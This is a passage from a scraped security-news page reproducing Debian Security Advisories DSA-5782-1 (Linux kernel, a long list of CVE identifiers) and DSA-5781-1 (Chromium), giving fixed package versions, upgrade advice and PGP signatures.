                 CVE-2024-46676 CVE-2024-46677 CVE-2024-46679 CVE-2024-46685  
                 CVE-2024-46686 CVE-2024-46689 CVE-2024-46694 CVE-2024-46702  
                 CVE-2024-46707 CVE-2024-46711 CVE-2024-46713 CVE-2024-46714  
                 CVE-2024-46715 CVE-2024-46716 CVE-2024-46717 CVE-2024-46719  
                 CVE-2024-46720 CVE-2024-46721 CVE-2024-46722 CVE-2024-46723  
                 CVE-2024-46724 CVE-2024-46725 CVE-2024-46726 CVE-2024-46731  
                 CVE-2024-46732 CVE-2024-46734 CVE-2024-46735 CVE-2024-46737  
                 CVE-2024-46738 CVE-2024-46739 CVE-2024-46740 CVE-2024-46743  
                 CVE-2024-46744 CVE-2024-46745 CVE-2024-46746 CVE-2024-46747  
                 CVE-2024-46750 CVE-2024-46752 CVE-2024-46755 CVE-2024-46756  
                 CVE-2024-46757 CVE-2024-46758 CVE-2024-46759 CVE-2024-46761  
                 CVE-2024-46763 CVE-2024-46770 CVE-2024-46771 CVE-2024-46773  
                 CVE-2024-46777 CVE-2024-46780 CVE-2024-46781 CVE-2024-46782  
                 CVE-2024-46783 CVE-2024-46784 CVE-2024-46791 CVE-2024-46794  
                 CVE-2024-46795 CVE-2024-46798 CVE-2024-46800 CVE-2024-46802  
                 CVE-2024-46804 CVE-2024-46805 CVE-2024-46807 CVE-2024-46810  
                 CVE-2024-46812 CVE-2024-46814 CVE-2024-46815 CVE-2024-46817  
                 CVE-2024-46818 CVE-2024-46819 CVE-2024-46821 CVE-2024-46822  
                 CVE-2024-46826 CVE-2024-46828 CVE-2024-46829 CVE-2024-46830  
                 CVE-2024-46832 CVE-2024-46835 CVE-2024-46836 CVE-2024-46840  
                 CVE-2024-46844 CVE-2024-46846 CVE-2024-46848 CVE-2024-46849  
                 CVE-2024-46852 CVE-2024-46853 CVE-2024-46854 CVE-2024-46855  
                 CVE-2024-46857 CVE-2024-46858 CVE-2024-46859 CVE-2024-46865

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.112-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmb+5rNfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Qe8Q/+NKIdMggBJxg+LefsFD2RDncuEOQMKMIpBMFmm7VsrGln85jOptgfZNgY  
6ytef8apSEw4MvwJ4TwlRDtNmAkwTauWd9cDx49BlDupZpdBGidWUW7RbombbihU  
UXSpRMsm/lsXyPF2Llgmo18DeEOfyrGyQfXHWYxRjjNNPRZvxpgXZnntENijYy0y  
e7ngYxVR6VwT2SDndICNLgJTZ+WGOHOD6DcrXvpwcHbcpCgFYrP1Iqe3gjbTX0VV  
Vcv417x40HfBBPxLtAFYZNDo6/Zgfxugeo/LQVMmXXFjLCJFswxukQt9CWSSKNzV  
0EsmgAn0C1xyq76sgCo49wKyfRlsoC4sH5sjRdod2bisY7PJK/DqKMK3nKg+zN0w  
GMbgb6a8Th93QuOkBuAm5gEclsPB0m35ZxSKNKZD+CKMBVYLB1OexI9v1dkTzRM/  
TP76yVltGmbECnI1ip+JSKYAgHwLgMfxEu2XNwFeVgIcES2CreD8LMXq3MstKyLB  
pwN6VRJ4n9vpW/xUxJcdFOpgvsYLs7xOcoXk6TEInwx0NhQBNj7eC4J2dbtN+g0c  
m349ryE+rZlPscH2vP0fzwXNfZemLb/KlZhhxraBW7dKOuHSJ+UHV3Hul9QTXzmD  
HtZRwbU6DfqqzS/1JKxfLA1oVLI98JiDicOJyBwdtKjJu9M1CRY=  
=J2U0  
-----END PGP SIGNATURE-----

Debian Security Advisory 5782-1

Debian Linux Security Advisory 5781-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5781-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonOctober 03, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-7025 CVE-2024-9369 CVE-2024-9370Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 129.0.6668.89-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmb+VpEACgkQZF0CR8NudjcrIBAAvzzNE73GYxK9O94ezzRCwoQ9+63+b//jaehANfSl4yhHdZfGpg2WuR2SBjtFUMc92gFUzrvtgKe/+gg5kY4r02YZkyZNEHsh5b5VjLBKjfMk4f+RnnEujqEFB1EDeBMbyRfMoi3dHlij4Gb4x+gpuxBJkoBa5DCnu3RD/KGWVMNw7AdDH2XUprGZ56qxzIdXIggj23baFwd3ms6aPpKVufB+RYvyj8qr+uIo1pyRdHZGjeZmbxwGLGA7R8VOfBJ4hj7bn63aNANYbgm5nzSYz7onmLhHIxlmGonDU2lsr34Kl9dViHz5peoMtlSfv9/zLaHXmJUEmXXL8Vf3jm975hcYSaWWggvnMVysWljSAbPuLloLISATzdLGDeHPtJDqX+Y9XjN2UZ1sJHRGRog5iZBPwj6H4QN8quGoGY9JxBlL3FOmgmMafZkUncEAKitpahtEMEsmayMl3iePHIulOUdOCVpnrGgaa1Lc0yAkR1VomlMrjrE2FB28y+dh4MiaERxMnO7EfSSRQ0nTD55iBzpdn3dRIDErqfMFyWSAfCDvPGhcRYU0vQaKysujrg+pUldkpIMPLnZvyytQFH6A9lYth9NBdAgMc1IN86BEyUXGcUTIO4FdQE+9QsWC3p7Iji/XK0WvEmXNjYe1M7zDFELRFxdhW6qVX9Xx2N+pTpM==V9OV-----END PGP SIGNATURE-----

Tag

#debian